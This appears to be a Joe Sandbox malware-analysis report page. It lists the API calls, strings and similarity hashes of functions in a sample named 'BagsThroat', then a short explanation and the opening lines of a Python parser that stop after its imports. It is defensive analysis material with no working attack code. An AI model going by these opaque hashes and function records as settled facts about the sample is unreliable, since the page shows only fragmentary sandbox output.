                                        • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                        • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                        • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                        • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                        APIs
                                        • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                        • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                        • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                        • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                          • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                        • GlobalFree.KERNEL32(00000000), ref: 00402387
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                        • String ID:
                                        • API String ID: 3376005127-0
                                        • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                        • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                        • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                        • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                        • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                        • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                        • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                        • String ID:
                                        • API String ID: 2568930968-0
                                        • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                        • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                        • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                        • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                        APIs
                                        • GetDlgItem.USER32(?), ref: 004020A3
                                        • GetClientRect.USER32(00000000,?), ref: 004020B0
                                        • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                        • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                        • DeleteObject.GDI32(00000000), ref: 004020EE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                        • String ID:
                                        • API String ID: 1849352358-0
                                        • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                        • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                        • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                        • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                        APIs
                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: MessageSend$Timeout
                                        • String ID: !
                                        • API String ID: 1777923405-2657877971
                                        • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                        • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                        • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                        • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                        APIs
                                        • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                        • wsprintfW.USER32 ref: 00404483
                                        • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: ItemTextlstrlenwsprintf
                                        • String ID: %u.%u%s%s
                                        • API String ID: 3540041739-3551169577
                                        • Opcode ID: 58b15896a84fc5e7a6d3d9a22e8d585b885ca92bf9a6589a07360a0de3a23a39
                                        • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                        • Opcode Fuzzy Hash: 58b15896a84fc5e7a6d3d9a22e8d585b885ca92bf9a6589a07360a0de3a23a39
                                        • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                        APIs
                                          • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                        Strings
                                        • DeleteRegKey: "%s\%s", xrefs: 00402843
                                        • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                        • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                        • API String ID: 1697273262-1764544995
                                        • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                        • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                        • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                        • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                        APIs
                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                          • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                          • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                        • lstrlenW.KERNEL32 ref: 004026B4
                                        • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                        • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                        • String ID: CopyFiles "%s"->"%s"
                                        • API String ID: 2577523808-3778932970
                                        • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                        • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                        • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                        • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: lstrcatwsprintf
                                        • String ID: %02x%c$...
                                        • API String ID: 3065427908-1057055748
                                        • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                        • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                        • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                        • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 00405083
                                          • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                        • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                        • String ID: Section: "%s"$Skipping section: "%s"
                                        • API String ID: 2266616436-4211696005
                                        • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                        • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                        • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                        • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                        APIs
                                        • GetDC.USER32(?), ref: 00402100
                                        • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424579,759223A0,00000000), ref: 00406902
                                        • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                          • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                        • String ID:
                                        • API String ID: 1599320355-0
                                        • Opcode ID: 2ae45dc5b744dabfc446a34129bb4571dfe0fe142ad68b921cc5a8ab1e19b1d4
                                        • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                        • Opcode Fuzzy Hash: 2ae45dc5b744dabfc446a34129bb4571dfe0fe142ad68b921cc5a8ab1e19b1d4
                                        • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                        APIs
                                          • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                        • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                        • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                        • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: lstrcpyn$CreateFilelstrcmp
                                        • String ID: Version
                                        • API String ID: 512980652-315105994
                                        • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                        • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                        • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                        • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                        APIs
                                        • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                        • GetTickCount.KERNEL32 ref: 00403303
                                        • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                        • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                        • String ID:
                                        • API String ID: 2102729457-0
                                        • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                        • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                        • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                        • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                        • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                        • String ID:
                                        • API String ID: 2883127279-0
                                        • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                        • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                        • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                        • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
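The records above are the flattened form of Joe Sandbox's per-function listing: an APIs list (with "Part of subcall function" entries for APIs reached indirectly, and some entries such as `wsprintfW.USER32 ref: 00404483` that carry no argument list), an optional Strings list, the memory dump the function was lifted from, and the Similarity hashes (API ID, String ID, API String ID, Opcode ID, Instruction Fuzzy Hash). The following Python is an added example, not Joe Sandbox code, that parses records in this shape so the Opcode ID and API String ID values can be pivoted on across reports and each function can be triaged by the APIs it reaches. The two sample records are copied from this page's listing (the DeleteRegKey/DeleteRegValue function at 0040280E and the GetProcAddress function at 004063C1); the tag table in `classify()` is this example's own heuristic, and nothing here decodes the meaning of the hash values themselves.

```python
"""Turn Joe Sandbox 'Execution Graph' function records into structured data.

Added example for this report page, not Joe Sandbox code. Field names follow the
listing (APIs, Strings, Memory Dump Source, Similarity); TAG_RULES is this
example's own triage heuristic.
"""
import re
from dataclasses import dataclass, field

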